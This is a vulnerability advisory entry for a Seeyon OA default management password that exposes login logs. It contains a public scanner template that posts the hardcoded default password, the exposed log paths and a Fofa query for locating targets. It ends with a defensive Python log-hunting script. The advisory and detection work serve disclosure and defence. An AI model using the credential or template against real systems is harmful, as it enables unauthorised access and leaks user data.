seeyon-management-default-password: Seeyon OA default password leads to sensitive information disclosure

Date: 2025-09-01 | Affected software: seeyon | POC: public

Vulnerability description

After logging in, the following links expose sensitive log information, such as the usernames that have logged in.
/seeyon/logs/login.log
/seeyon/logs/v3x.log
Fofa: app="致远互联-OA"

PoC code [public]

id: seeyon-management-default-password

info:
  name: 致远OA存在默认口令导致敏感信息泄露
  author: zan8in
  severity: high
  verified: true
  description: |-
    登录后访问以下链接即可获得一些敏感日志信息,例如登录的用户名。
    /seeyon/logs/login.log
    /seeyon/logs/v3x.log
    Fofa: app="致远互联-OA"
  tags: seeyon,default-password
  created: 2023/12/09

rules:
  r0:
    request:
      method: POST
      path: /seeyon/management/index.jsp
      body: password=WLCCYBD@SEEYON
    expression: response.status == 302 && response.headers["location"].contains("/seeyon/management/status.jsp")
expression: r0()
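
For defenders, the same request pattern can be hunted in web access logs. The following is an added example, not part of the original entry or of any Seeyon tooling: it assumes combined-format access logs, treats a 302 on the management login POST as a successful login (the Location header checked by the rule above is not recorded in access logs), and uses constructed sample lines.

```python
import re
from collections import defaultdict

# Constructed sample lines in combined access-log format (not from a real system).
SAMPLE_LOG = """\
203.0.113.7 - - [09/Dec/2023:10:01:02 +0000] "POST /seeyon/management/index.jsp HTTP/1.1" 302 0 "-" "curl/8.0"
203.0.113.7 - - [09/Dec/2023:10:01:05 +0000] "GET /seeyon/logs/login.log HTTP/1.1" 200 48213 "-" "curl/8.0"
198.51.100.4 - - [09/Dec/2023:10:02:11 +0000] "POST /seeyon/management/index.jsp HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
192.0.2.15 - - [09/Dec/2023:10:03:40 +0000] "GET /seeyon/main.do HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
198.51.100.4 - - [09/Dec/2023:10:04:00 +0000] "GET /seeyon/logs/v3x.log HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, path and status of one combined-format line.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
LOGIN_PATH = "/seeyon/management/index.jsp"
LOG_PATHS = {"/seeyon/logs/login.log", "/seeyon/logs/v3x.log"}

def classify(method, path, status):
    """Map one request to an event name, or None if it is not of interest."""
    path = path.split("?", 1)[0]  # ignore any query string
    if method == "POST" and path == LOGIN_PATH:
        # Assumption: 302 means the login was accepted, anything else a failed try.
        return "mgmt_login_ok" if status == 302 else "mgmt_login_attempt"
    if path in LOG_PATHS and status == 200:
        return "log_file_read"
    return None

def scan(text):
    """Return {client_ip: [(timestamp, event), ...]} for matching requests."""
    findings = defaultdict(list)
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        event = classify(m["method"], m["path"], int(m["status"]))
        if event:
            findings[m["ip"]].append((m["ts"], event))
    return dict(findings)

def high_risk(findings):
    """Clients that both logged in to the management page and read a log file."""
    return sorted(ip for ip, evs in findings.items()
                  if {"mgmt_login_ok", "log_file_read"} <= {e for _, e in evs})

if __name__ == "__main__":
    print(high_risk(scan(SAMPLE_LOG)))
```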
  
